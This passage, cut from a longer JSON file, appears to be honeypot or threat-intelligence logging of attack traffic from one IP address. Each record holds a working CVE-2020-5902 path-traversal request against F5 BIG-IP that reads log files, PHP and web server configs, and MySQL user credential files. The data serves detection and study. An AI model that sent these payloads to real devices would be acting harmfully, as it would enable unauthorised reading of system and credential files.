  1584. "last_seen": "2020-07-09T08:05:55Z"
  1585. },
  1586. {
  1587. "event_id": "e1a1cf8795fc52d7d96814df47cd6914d9b699cebb4a18f98ca03f15a4897eb7",
  1588. "source_ip_address": "85.248.227.163",
  1589. "country": "SK",
  1590. "user_agent": "python-requests/2.23.0",
  1591. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/daemon.log HTTP/1.1",
  1592. "post_data": "",
  1593. "target_port": 443,
  1594. "protocol": "tcp",
  1595. "tags": [
  1596. {
  1597. "cve": "CVE-2020-5902",
  1598. "category": "Platform",
  1599. "description": "F5 BIG-IP Configuration Utility RCE"
  1600. }
  1601. ],
  1602. "event_count": 1,
  1603. "first_seen": "2020-07-09T08:05:54Z",
  1604. "last_seen": "2020-07-09T08:05:54Z"
  1605. },
  1606. {
  1607. "event_id": "97cea31afa09d180206e57c3dbc357beeb6701602bb82aeeb115456a7d4b2eb0",
  1608. "source_ip_address": "85.248.227.163",
  1609. "country": "SK",
  1610. "user_agent": "python-requests/2.23.0",
  1611. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/cups/error.log HTTP/1.1",
  1612. "post_data": "",
  1613. "target_port": 443,
  1614. "protocol": "tcp",
  1615. "tags": [
  1616. {
  1617. "cve": "CVE-2020-5902",
  1618. "category": "Platform",
  1619. "description": "F5 BIG-IP Configuration Utility RCE"
  1620. }
  1621. ],
  1622. "event_count": 1,
  1623. "first_seen": "2020-07-09T08:05:52Z",
  1624. "last_seen": "2020-07-09T08:05:52Z"
  1625. },
  1626. {
  1627. "event_id": "fdc2e7400dd47073230eab19bacd57a318c6225c9e584d801600a2545de54312",
  1628. "source_ip_address": "85.248.227.163",
  1629. "country": "SK",
  1630. "user_agent": "python-requests/2.23.0",
  1631. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/chttp.log HTTP/1.1",
  1632. "post_data": "",
  1633. "target_port": 443,
  1634. "protocol": "tcp",
  1635. "tags": [
  1636. {
  1637. "cve": "CVE-2020-5902",
  1638. "category": "Platform",
  1639. "description": "F5 BIG-IP Configuration Utility RCE"
  1640. }
  1641. ],
  1642. "event_count": 1,
  1643. "first_seen": "2020-07-09T08:05:51Z",
  1644. "last_seen": "2020-07-09T08:05:51Z"
  1645. },
  1646. {
  1647. "event_id": "83cc5e21e37acfe3255cfd841fe3a7b1c3cb7c3d7fc7b78bc27376858ae43960",
  1648. "source_ip_address": "85.248.227.163",
  1649. "country": "SK",
  1650. "user_agent": "python-requests/2.23.0",
  1651. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/htmp HTTP/1.1",
  1652. "post_data": "",
  1653. "target_port": 443,
  1654. "protocol": "tcp",
  1655. "tags": [
  1656. {
  1657. "cve": "CVE-2020-5902",
  1658. "category": "Platform",
  1659. "description": "F5 BIG-IP Configuration Utility RCE"
  1660. }
  1661. ],
  1662. "event_count": 1,
  1663. "first_seen": "2020-07-09T08:05:49Z",
  1664. "last_seen": "2020-07-09T08:05:49Z"
  1665. },
  1666. {
  1667. "event_id": "e07736941570227d24b6bba891907afd1b1f71fca5ba58ffad029e85cf362dc8",
  1668. "source_ip_address": "85.248.227.163",
  1669. "country": "SK",
  1670. "user_agent": "python-requests/2.23.0",
  1671. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/boot HTTP/1.1",
  1672. "post_data": "",
  1673. "target_port": 443,
  1674. "protocol": "tcp",
  1675. "tags": [
  1676. {
  1677. "cve": "CVE-2020-5902",
  1678. "category": "Platform",
  1679. "description": "F5 BIG-IP Configuration Utility RCE"
  1680. }
  1681. ],
  1682. "event_count": 1,
  1683. "first_seen": "2020-07-09T08:05:48Z",
  1684. "last_seen": "2020-07-09T08:05:48Z"
  1685. },
  1686. {
  1687. "event_id": "d1c8e1a52f65c9674a1573caf2bb806d1c6930148d9984ab50d480ca11285787",
  1688. "source_ip_address": "85.248.227.163",
  1689. "country": "SK",
  1690. "user_agent": "python-requests/2.23.0",
  1691. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/auth.log HTTP/1.1",
  1692. "post_data": "",
  1693. "target_port": 443,
  1694. "protocol": "tcp",
  1695. "tags": [
  1696. {
  1697. "cve": "CVE-2020-5902",
  1698. "category": "Platform",
  1699. "description": "F5 BIG-IP Configuration Utility RCE"
  1700. }
  1701. ],
  1702. "event_count": 1,
  1703. "first_seen": "2020-07-09T08:05:46Z",
  1704. "last_seen": "2020-07-09T08:05:46Z"
  1705. },
  1706. {
  1707. "event_id": "986537e41cdd692f4d06b2854daef514a29e2415d59f8503db5395c6bb609039",
  1708. "source_ip_address": "85.248.227.163",
  1709. "country": "SK",
  1710. "user_agent": "python-requests/2.23.0",
  1711. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache-ssl/error.log HTTP/1.1",
  1712. "post_data": "",
  1713. "target_port": 443,
  1714. "protocol": "tcp",
  1715. "tags": [
  1716. {
  1717. "cve": "CVE-2020-5902",
  1718. "category": "Platform",
  1719. "description": "F5 BIG-IP Configuration Utility RCE"
  1720. }
  1721. ],
  1722. "event_count": 1,
  1723. "first_seen": "2020-07-09T08:05:45Z",
  1724. "last_seen": "2020-07-09T08:05:45Z"
  1725. },
  1726. {
  1727. "event_id": "d73ef8c414896bf2fe135561265d36e4e39c218a2c2072937da3ee018257bcbd",
  1728. "source_ip_address": "85.248.227.163",
  1729. "country": "SK",
  1730. "user_agent": "python-requests/2.23.0",
  1731. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache-ssl/access.log HTTP/1.1",
  1732. "post_data": "",
  1733. "target_port": 443,
  1734. "protocol": "tcp",
  1735. "tags": [
  1736. {
  1737. "cve": "CVE-2020-5902",
  1738. "category": "Platform",
  1739. "description": "F5 BIG-IP Configuration Utility RCE"
  1740. }
  1741. ],
  1742. "event_count": 1,
  1743. "first_seen": "2020-07-09T08:05:43Z",
  1744. "last_seen": "2020-07-09T08:05:43Z"
  1745. },
  1746. {
  1747. "event_id": "e3a3bb52f05703bec648cb1654633282e4c82238ec4ed2374b0db4ac05b5ac22",
  1748. "source_ip_address": "85.248.227.163",
  1749. "country": "SK",
  1750. "user_agent": "python-requests/2.23.0",
  1751. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache/error.log HTTP/1.1",
  1752. "post_data": "",
  1753. "target_port": 443,
  1754. "protocol": "tcp",
  1755. "tags": [
  1756. {
  1757. "cve": "CVE-2020-5902",
  1758. "category": "Platform",
  1759. "description": "F5 BIG-IP Configuration Utility RCE"
  1760. }
  1761. ],
  1762. "event_count": 1,
  1763. "first_seen": "2020-07-09T08:05:42Z",
  1764. "last_seen": "2020-07-09T08:05:42Z"
  1765. },
  1766. {
  1767. "event_id": "42212a1afe8f177da8c8639cef6c967d37b0d14afb628405939665f1130d876a",
  1768. "source_ip_address": "85.248.227.163",
  1769. "country": "SK",
  1770. "user_agent": "python-requests/2.23.0",
  1771. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache/error_log HTTP/1.1",
  1772. "post_data": "",
  1773. "target_port": 443,
  1774. "protocol": "tcp",
  1775. "tags": [
  1776. {
  1777. "cve": "CVE-2020-5902",
  1778. "category": "Platform",
  1779. "description": "F5 BIG-IP Configuration Utility RCE"
  1780. }
  1781. ],
  1782. "event_count": 1,
  1783. "first_seen": "2020-07-09T08:05:40Z",
  1784. "last_seen": "2020-07-09T08:05:40Z"
  1785. },
  1786. {
  1787. "event_id": "1af14abf50fcf5cf97ef9a7d60351df0dd51d76e6a3bd7d74cc476e6a83a683e",
  1788. "source_ip_address": "85.248.227.163",
  1789. "country": "SK",
  1790. "user_agent": "python-requests/2.23.0",
  1791. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache/access.log HTTP/1.1",
  1792. "post_data": "",
  1793. "target_port": 443,
  1794. "protocol": "tcp",
  1795. "tags": [
  1796. {
  1797. "cve": "CVE-2020-5902",
  1798. "category": "Platform",
  1799. "description": "F5 BIG-IP Configuration Utility RCE"
  1800. }
  1801. ],
  1802. "event_count": 1,
  1803. "first_seen": "2020-07-09T08:05:39Z",
  1804. "last_seen": "2020-07-09T08:05:39Z"
  1805. },
  1806. {
  1807. "event_id": "0fb35222e4aeb905d27a58985050aab37654bb5aea2bda62c943f0a1c987357a",
  1808. "source_ip_address": "85.248.227.163",
  1809. "country": "SK",
  1810. "user_agent": "python-requests/2.23.0",
  1811. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache/access_log HTTP/1.1",
  1812. "post_data": "",
  1813. "target_port": 443,
  1814. "protocol": "tcp",
  1815. "tags": [
  1816. {
  1817. "cve": "CVE-2020-5902",
  1818. "category": "Platform",
  1819. "description": "F5 BIG-IP Configuration Utility RCE"
  1820. }
  1821. ],
  1822. "event_count": 1,
  1823. "first_seen": "2020-07-09T08:05:37Z",
  1824. "last_seen": "2020-07-09T08:05:37Z"
  1825. },
  1826. {
  1827. "event_id": "9e88d606a36fbfef66254bc0172c00d45e299d981d364caadb4a15431fbb0579",
  1828. "source_ip_address": "85.248.227.163",
  1829. "country": "SK",
  1830. "user_agent": "python-requests/2.23.0",
  1831. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache2/error.log HTTP/1.1",
  1832. "post_data": "",
  1833. "target_port": 443,
  1834. "protocol": "tcp",
  1835. "tags": [
  1836. {
  1837. "cve": "CVE-2020-5902",
  1838. "category": "Platform",
  1839. "description": "F5 BIG-IP Configuration Utility RCE"
  1840. }
  1841. ],
  1842. "event_count": 1,
  1843. "first_seen": "2020-07-09T08:05:36Z",
  1844. "last_seen": "2020-07-09T08:05:36Z"
  1845. },
  1846. {
  1847. "event_id": "668f2e1c6fc06edcfae0b5897d49aa20405e4dff6abe178e6fa3097aa172a240",
  1848. "source_ip_address": "85.248.227.163",
  1849. "country": "SK",
  1850. "user_agent": "python-requests/2.23.0",
  1851. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache2/error_log HTTP/1.1",
  1852. "post_data": "",
  1853. "target_port": 443,
  1854. "protocol": "tcp",
  1855. "tags": [
  1856. {
  1857. "cve": "CVE-2020-5902",
  1858. "category": "Platform",
  1859. "description": "F5 BIG-IP Configuration Utility RCE"
  1860. }
  1861. ],
  1862. "event_count": 1,
  1863. "first_seen": "2020-07-09T08:05:34Z",
  1864. "last_seen": "2020-07-09T08:05:34Z"
  1865. },
  1866. {
  1867. "event_id": "004e92ab5403522fadbb6cad84d4dde7a57d1e22d97ae476ebcf6162dad942f2",
  1868. "source_ip_address": "85.248.227.163",
  1869. "country": "SK",
  1870. "user_agent": "python-requests/2.23.0",
  1871. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache2/access.log HTTP/1.1",
  1872. "post_data": "",
  1873. "target_port": 443,
  1874. "protocol": "tcp",
  1875. "tags": [
  1876. {
  1877. "cve": "CVE-2020-5902",
  1878. "category": "Platform",
  1879. "description": "F5 BIG-IP Configuration Utility RCE"
  1880. }
  1881. ],
  1882. "event_count": 1,
  1883. "first_seen": "2020-07-09T08:05:33Z",
  1884. "last_seen": "2020-07-09T08:05:33Z"
  1885. },
  1886. {
  1887. "event_id": "d82c681870ce2ae03d01b90b087646d4860b866297acef63c0d2393531fb2d09",
  1888. "source_ip_address": "85.248.227.163",
  1889. "country": "SK",
  1890. "user_agent": "python-requests/2.23.0",
  1891. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache2/access_log HTTP/1.1",
  1892. "post_data": "",
  1893. "target_port": 443,
  1894. "protocol": "tcp",
  1895. "tags": [
  1896. {
  1897. "cve": "CVE-2020-5902",
  1898. "category": "Platform",
  1899. "description": "F5 BIG-IP Configuration Utility RCE"
  1900. }
  1901. ],
  1902. "event_count": 1,
  1903. "first_seen": "2020-07-09T08:05:31Z",
  1904. "last_seen": "2020-07-09T08:05:31Z"
  1905. },
  1906. {
  1907. "event_id": "40aefe1be11731839bd027781b9cf5794275e1eaf1e8e41213a9020ad44f1208",
  1908. "source_ip_address": "85.248.227.163",
  1909. "country": "SK",
  1910. "user_agent": "python-requests/2.23.0",
  1911. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/local/www/conf/php.ini HTTP/1.1",
  1912. "post_data": "",
  1913. "target_port": 443,
  1914. "protocol": "tcp",
  1915. "tags": [
  1916. {
  1917. "cve": "CVE-2020-5902",
  1918. "category": "Platform",
  1919. "description": "F5 BIG-IP Configuration Utility RCE"
  1920. }
  1921. ],
  1922. "event_count": 1,
  1923. "first_seen": "2020-07-09T08:05:29Z",
  1924. "last_seen": "2020-07-09T08:05:29Z"
  1925. },
  1926. {
  1927. "event_id": "eddf936419aec431ae7b0f4a976757ae4475abdaee773747bda0a69e147c6c87",
  1928. "source_ip_address": "85.248.227.163",
  1929. "country": "SK",
  1930. "user_agent": "python-requests/2.23.0",
  1931. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/lib/mysql/mysql/user.MYD HTTP/1.1",
  1932. "post_data": "",
  1933. "target_port": 443,
  1934. "protocol": "tcp",
  1935. "tags": [
  1936. {
  1937. "cve": "CVE-2020-5902",
  1938. "category": "Platform",
  1939. "description": "F5 BIG-IP Configuration Utility RCE"
  1940. }
  1941. ],
  1942. "event_count": 1,
  1943. "first_seen": "2020-07-09T08:05:28Z",
  1944. "last_seen": "2020-07-09T08:05:28Z"
  1945. },
  1946. {
  1947. "event_id": "a25ca4621d4435f949230018da79eaf9efd53d188a1601148dac9c6757974676",
  1948. "source_ip_address": "85.248.227.163",
  1949. "country": "SK",
  1950. "user_agent": "python-requests/2.23.0",
  1951. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/lib/mysql/my.cnf HTTP/1.1",
  1952. "post_data": "",
  1953. "target_port": 443,
  1954. "protocol": "tcp",
  1955. "tags": [
  1956. {
  1957. "cve": "CVE-2020-5902",
  1958. "category": "Platform",
  1959. "description": "F5 BIG-IP Configuration Utility RCE"
  1960. }
  1961. ],
  1962. "event_count": 1,
  1963. "first_seen": "2020-07-09T08:05:26Z",
  1964. "last_seen": "2020-07-09T08:05:26Z"
  1965. },
  1966. {
  1967. "event_id": "a69c3f7cdaeeed9dcee90a1d57f26c1d3f798fd3685546a1fab26adce2b31448",
  1968. "source_ip_address": "85.248.227.163",
  1969. "country": "SK",
  1970. "user_agent": "python-requests/2.23.0",
  1971. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/cpanel/cpanel.config HTTP/1.1",
  1972. "post_data": "",
  1973. "target_port": 443,
  1974. "protocol": "tcp",
  1975. "tags": [
  1976. {
  1977. "cve": "CVE-2020-5902",
  1978. "category": "Platform",
  1979. "description": "F5 BIG-IP Configuration Utility RCE"
  1980. }
  1981. ],
  1982. "event_count": 1,
  1983. "first_seen": "2020-07-09T08:05:25Z",
  1984. "last_seen": "2020-07-09T08:05:25Z"
  1985. },
  1986. {
  1987. "event_id": "7c33196cb95d6585a96427fd4611cf71e3b0076cfa8d69b47aebb372cc7fa80d",
  1988. "source_ip_address": "85.248.227.163",
  1989. "country": "SK",
  1990. "user_agent": "python-requests/2.23.0",
  1991. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/apache/logs/error_log HTTP/1.1",
  1992. "post_data": "",
  1993. "target_port": 443,
  1994. "protocol": "tcp",
  1995. "tags": [
  1996. {
  1997. "cve": "CVE-2020-5902",
  1998. "category": "Platform",
  1999. "description": "F5 BIG-IP Configuration Utility RCE"
  2000. }
  2001. ],
  2002. "event_count": 1,
  2003. "first_seen": "2020-07-09T08:05:23Z",
  2004. "last_seen": "2020-07-09T08:05:23Z"
  2005. },
  2006. {
  2007. "event_id": "0d976be75a39bbca8c7fa8226bcaa7cb462a06012aee1a286ed7af849ee41e0e",
  2008. "source_ip_address": "85.248.227.163",
  2009. "country": "SK",
  2010. "user_agent": "python-requests/2.23.0",
  2011. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/apache/logs/access_log HTTP/1.1",
  2012. "post_data": "",
  2013. "target_port": 443,
  2014. "protocol": "tcp",
  2015. "tags": [
  2016. {
  2017. "cve": "CVE-2020-5902",
  2018. "category": "Platform",
  2019. "description": "F5 BIG-IP Configuration Utility RCE"
  2020. }
  2021. ],
  2022. "event_count": 1,
  2023. "first_seen": "2020-07-09T08:05:22Z",
  2024. "last_seen": "2020-07-09T08:05:22Z"
  2025. },
  2026. {
  2027. "event_id": "8a678a15aa0f95de44797f3134575e785b3696c9e31dbd3cca59576431a55db6",
  2028. "source_ip_address": "85.248.227.163",
  2029. "country": "SK",
  2030. "user_agent": "python-requests/2.23.0",
  2031. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/apache2/config.inc HTTP/1.1",
  2032. "post_data": "",
  2033. "target_port": 443,
  2034. "protocol": "tcp",
  2035. "tags": [
  2036. {
  2037. "cve": "CVE-2020-5902",
  2038. "category": "Platform",
  2039. "description": "F5 BIG-IP Configuration Utility RCE"
  2040. }
  2041. ],
  2042. "event_count": 1,
  2043. "first_seen": "2020-07-09T08:05:20Z",
  2044. "last_seen": "2020-07-09T08:05:20Z"
  2045. },
  2046. {
  2047. "event_id": "4329dfa013dbe2dcc75cf02a448d4dfbc36bdcdfa12a3de3e9a0f2c0639064d9",
  2048. "source_ip_address": "85.248.227.163",
  2049. "country": "SK",
  2050. "user_agent": "python-requests/2.23.0",
  2051. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/adm/log/xferlog HTTP/1.1",
  2052. "post_data": "",
  2053. "target_port": 443,
  2054. "protocol": "tcp",
  2055. "tags": [
  2056. {
  2057. "cve": "CVE-2020-5902",
  2058. "category": "Platform",
  2059. "description": "F5 BIG-IP Configuration Utility RCE"
  2060. }
  2061. ],
  2062. "event_count": 1,
  2063. "first_seen": "2020-07-09T08:05:19Z",
  2064. "last_seen": "2020-07-09T08:05:19Z"
  2065. },
  2066. {
  2067. "event_id": "1601ee2e9848b68ef434af9dccdaaea96dd379e46c67d9acccd5258eee5d348f",
  2068. "source_ip_address": "85.248.227.163",
  2069. "country": "SK",
  2070. "user_agent": "python-requests/2.23.0",
  2071. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/sbin/pure-config.pl HTTP/1.1",
  2072. "post_data": "",
  2073. "target_port": 443,
  2074. "protocol": "tcp",
  2075. "tags": [
  2076. {
  2077. "cve": "CVE-2020-5902",
  2078. "category": "Platform",
  2079. "description": "F5 BIG-IP Configuration Utility RCE"
  2080. }
  2081. ],
  2082. "event_count": 1,
  2083. "first_seen": "2020-07-09T08:05:17Z",
  2084. "last_seen": "2020-07-09T08:05:17Z"
  2085. },
  2086. {
  2087. "event_id": "82aa5a03696456eeac428056755e49a6269bacacc2ce57caa7cacbe61a3bfc44",
  2088. "source_ip_address": "85.248.227.163",
  2089. "country": "SK",
  2090. "user_agent": "python-requests/2.23.0",
  2091. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/Zend/etc/php.ini HTTP/1.1",
  2092. "post_data": "",
  2093. "target_port": 443,
  2094. "protocol": "tcp",
  2095. "tags": [
  2096. {
  2097. "cve": "CVE-2020-5902",
  2098. "category": "Platform",
  2099. "description": "F5 BIG-IP Configuration Utility RCE"
  2100. }
  2101. ],
  2102. "event_count": 1,
  2103. "first_seen": "2020-07-09T08:05:16Z",
  2104. "last_seen": "2020-07-09T08:05:16Z"
  2105. },
  2106. {
  2107. "event_id": "045068b10faa6936fd7f90cf42e539ec81d5dd2610d6a0e536319661ec167e14",
  2108. "source_ip_address": "85.248.227.163",
  2109. "country": "SK",
  2110. "user_agent": "python-requests/2.23.0",
  2111. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/www/logs/httpd_log HTTP/1.1",
  2112. "post_data": "",
  2113. "target_port": 443,
  2114. "protocol": "tcp",
  2115. "tags": [
  2116. {
  2117. "cve": "CVE-2020-5902",
  2118. "category": "Platform",
  2119. "description": "F5 BIG-IP Configuration Utility RCE"
  2120. }
  2121. ],
  2122. "event_count": 1,
  2123. "first_seen": "2020-07-09T08:05:14Z",
  2124. "last_seen": "2020-07-09T08:05:14Z"
  2125. },
  2126. {
  2127. "event_id": "929ffb1bc03c8565992e78d0e2315360efb06c7cb1ec1e4e2ebdb21ff3b8fb56",
  2128. "source_ip_address": "85.248.227.163",
  2129. "country": "SK",
  2130. "user_agent": "python-requests/2.23.0",
  2131. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/pureftpd/sbin/pure-config.pl HTTP/1.1",
  2132. "post_data": "",
  2133. "target_port": 443,
  2134. "protocol": "tcp",
  2135. "tags": [
  2136. {
  2137. "cve": "CVE-2020-5902",
  2138. "category": "Platform",
  2139. "description": "F5 BIG-IP Configuration Utility RCE"
  2140. }
  2141. ],
  2142. "event_count": 1,
  2143. "first_seen": "2020-07-09T08:05:13Z",
  2144. "last_seen": "2020-07-09T08:05:13Z"
  2145. },
  2146. {
  2147. "event_id": "3682dbc260f81162de1f1f5fbe87880d109c25d5b3b19782cd0fc760325e0e36",
  2148. "source_ip_address": "85.248.227.163",
  2149. "country": "SK",
  2150. "user_agent": "python-requests/2.23.0",
  2151. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/pureftpd/etc/pureftpd.pdn HTTP/1.1",
  2152. "post_data": "",
  2153. "target_port": 443,
  2154. "protocol": "tcp",
  2155. "tags": [
  2156. {
  2157. "cve": "CVE-2020-5902",
  2158. "category": "Platform",
  2159. "description": "F5 BIG-IP Configuration Utility RCE"
  2160. }
  2161. ],
  2162. "event_count": 1,
  2163. "first_seen": "2020-07-09T08:05:11Z",
  2164. "last_seen": "2020-07-09T08:05:11Z"
  2165. },
  2166. {
  2167. "event_id": "0f81f0be2cfc56f39b5643487d5a8697026de6a35641e718b6062ad6ec4a1a94",
  2168. "source_ip_address": "85.248.227.163",
  2169. "country": "SK",
  2170. "user_agent": "python-requests/2.23.0",
  2171. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/pureftpd/etc/pure-ftpd.conf HTTP/1.1",
  2172. "post_data": "",
  2173. "target_port": 443,
  2174. "protocol": "tcp",
  2175. "tags": [
  2176. {
  2177. "cve": "CVE-2020-5902",
  2178. "category": "Platform",
  2179. "description": "F5 BIG-IP Configuration Utility RCE"
  2180. }
  2181. ],
  2182. "event_count": 1,
  2183. "first_seen": "2020-07-09T08:05:10Z",
  2184. "last_seen": "2020-07-09T08:05:10Z"
  2185. },
  2186. {
  2187. "event_id": "cfd52876d1ad71fdd5ee3b3f9584676d38ea1f71e3f77a19f9b6e0ca13cbe7a5",
  2188. "source_ip_address": "85.248.227.163",
  2189. "country": "SK",
  2190. "user_agent": "python-requests/2.23.0",
  2191. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php/lib/php.ini HTTP/1.1",
  2192. "post_data": "",
  2193. "target_port": 443,
  2194. "protocol": "tcp",
  2195. "tags": [
  2196. {
  2197. "cve": "CVE-2020-5902",
  2198. "category": "Platform",
  2199. "description": "F5 BIG-IP Configuration Utility RCE"
  2200. }
  2201. ],
  2202. "event_count": 1,
  2203. "first_seen": "2020-07-09T08:05:08Z",
  2204. "last_seen": "2020-07-09T08:05:08Z"
  2205. },
  2206. {
  2207. "event_id": "0202cef9aa9ad2151a0f3ce6febaf8607f5977116e0937b80c340925d781f05d",
  2208. "source_ip_address": "85.248.227.163",
  2209. "country": "SK",
  2210. "user_agent": "python-requests/2.23.0",
  2211. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php/httpd.conf.ini HTTP/1.1",
  2212. "post_data": "",
  2213. "target_port": 443,
  2214. "protocol": "tcp",
  2215. "tags": [
  2216. {
  2217. "cve": "CVE-2020-5902",
  2218. "category": "Platform",
  2219. "description": "F5 BIG-IP Configuration Utility RCE"
  2220. }
  2221. ],
  2222. "event_count": 1,
  2223. "first_seen": "2020-07-09T08:05:07Z",
  2224. "last_seen": "2020-07-09T08:05:07Z"
  2225. },
  2226. {
  2227. "event_id": "0acaf1a67980b8ccbfc84dae8f7babd8e7882ce896e0aca7e7282b1484327cc8",
  2228. "source_ip_address": "85.248.227.163",
  2229. "country": "SK",
  2230. "user_agent": "python-requests/2.23.0",
  2231. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php/httpd.conf HTTP/1.1",
  2232. "post_data": "",
  2233. "target_port": 443,
  2234. "protocol": "tcp",
  2235. "tags": [
  2236. {
  2237. "cve": "CVE-2020-5902",
  2238. "category": "Platform",
  2239. "description": "F5 BIG-IP Configuration Utility RCE"
  2240. }
  2241. ],
  2242. "event_count": 1,
  2243. "first_seen": "2020-07-09T08:05:06Z",
  2244. "last_seen": "2020-07-09T08:05:06Z"
  2245. },
  2246. {
  2247. "event_id": "6b39bbe430b6c981d82087f396e0c99b152ac7af166a72f524e49136fb52815e",
  2248. "source_ip_address": "85.248.227.163",
  2249. "country": "SK",
  2250. "user_agent": "python-requests/2.23.0",
  2251. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php5/lib/php.ini HTTP/1.1",
  2252. "post_data": "",
  2253. "target_port": 443,
  2254. "protocol": "tcp",
  2255. "tags": [
  2256. {
  2257. "cve": "CVE-2020-5902",
  2258. "category": "Platform",
  2259. "description": "F5 BIG-IP Configuration Utility RCE"
  2260. }
  2261. ],
  2262. "event_count": 1,
  2263. "first_seen": "2020-07-09T08:05:04Z",
  2264. "last_seen": "2020-07-09T08:05:04Z"
  2265. },
  2266. {
  2267. "event_id": "b1b838409c66c6831acdfd1320f288f30ed0abf60c44aa6d9e1d14efee22270c",
  2268. "source_ip_address": "85.248.227.163",
  2269. "country": "SK",
  2270. "user_agent": "python-requests/2.23.0",
  2271. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php5/httpd.conf.php HTTP/1.1",
  2272. "post_data": "",
  2273. "target_port": 443,
  2274. "protocol": "tcp",
  2275. "tags": [
  2276. {
  2277. "cve": "CVE-2020-5902",
  2278. "category": "Platform",
  2279. "description": "F5 BIG-IP Configuration Utility RCE"
  2280. }
  2281. ],
  2282. "event_count": 1,
  2283. "first_seen": "2020-07-09T08:05:03Z",
  2284. "last_seen": "2020-07-09T08:05:03Z"
  2285. },
  2286. {
  2287. "event_id": "b356ea14563293150f0be0dc4c8e3a2d8b1e56db1580d284164b0c6cb34037db",
  2288. "source_ip_address": "85.248.227.163",
  2289. "country": "SK",
  2290. "user_agent": "python-requests/2.23.0",
  2291. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php5/httpd.conf HTTP/1.1",
  2292. "post_data": "",
  2293. "target_port": 443,
  2294. "protocol": "tcp",
  2295. "tags": [
  2296. {
  2297. "cve": "CVE-2020-5902",
  2298. "category": "Platform",
  2299. "description": "F5 BIG-IP Configuration Utility RCE"
  2300. }
  2301. ],
  2302. "event_count": 1,
  2303. "first_seen": "2020-07-09T08:05:01Z",
  2304. "last_seen": "2020-07-09T08:05:01Z"
  2305. },
  2306. {
  2307. "event_id": "d88ecb89c269381fb79aecee2807513417f7cbb7d6edc529264e4982a3f42e3a",
  2308. "source_ip_address": "85.248.227.163",
  2309. "country": "SK",
  2310. "user_agent": "python-requests/2.23.0",
  2311. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php4/lib/php.ini HTTP/1.1",
  2312. "post_data": "",
  2313. "target_port": 443,
  2314. "protocol": "tcp",
  2315. "tags": [
  2316. {
  2317. "cve": "CVE-2020-5902",
  2318. "category": "Platform",
  2319. "description": "F5 BIG-IP Configuration Utility RCE"
  2320. }
  2321. ],
  2322. "event_count": 1,
  2323. "first_seen": "2020-07-09T08:05:00Z",
  2324. "last_seen": "2020-07-09T08:05:00Z"
  2325. },
  2326. {
  2327. "event_id": "6f8ea89bedf23ebbf1d29661932e56c45d3e8afa4c4f715ddbd7de3aab3fce68",
  2328. "source_ip_address": "85.248.227.163",
  2329. "country": "SK",
  2330. "user_agent": "python-requests/2.23.0",
  2331. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php4/httpd.conf.php HTTP/1.1",
  2332. "post_data": "",
  2333. "target_port": 443,
  2334. "protocol": "tcp",
  2335. "tags": [
  2336. {
  2337. "cve": "CVE-2020-5902",
  2338. "category": "Platform",
  2339. "description": "F5 BIG-IP Configuration Utility RCE"
  2340. }
  2341. ],
  2342. "event_count": 1,
